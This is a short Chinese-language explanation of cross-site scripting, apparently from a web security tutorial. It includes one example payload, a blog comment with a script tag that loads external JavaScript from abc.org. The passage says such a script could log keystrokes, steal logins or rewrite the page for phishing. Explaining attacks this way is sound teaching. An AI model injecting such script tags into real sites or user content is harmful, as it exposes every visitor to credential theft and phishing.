跨站脚本攻击(Cross-Site Scrpting)简称为XSS,指的是向其他域中的页面的DOM注入一段脚本,该域对其他用户可见。恶意用户可能会试图利用这一弱点记录用户的击键或操作行为,以窃取用户的某些信息。在过去,包含用户提交内容的站点特别容易成为这一漏洞的目标。例如:用户在博客中提交评论,并且在其中包含类似于如下代码的脚本块:
Nice Bolg!Thanks for post that ...<script type="text/javascript" src="http://abc.org/aa.js"></script>
当浏览该页面时,仅有评论是可见的,但对于每一个访问该页面的用户,浏览器都将为该用户下载一份外部脚本。在该外部脚本中可以窥探用户的登录信息或者其他屏幕内容,甚至重写DOM以实现网络钓鱼的企图。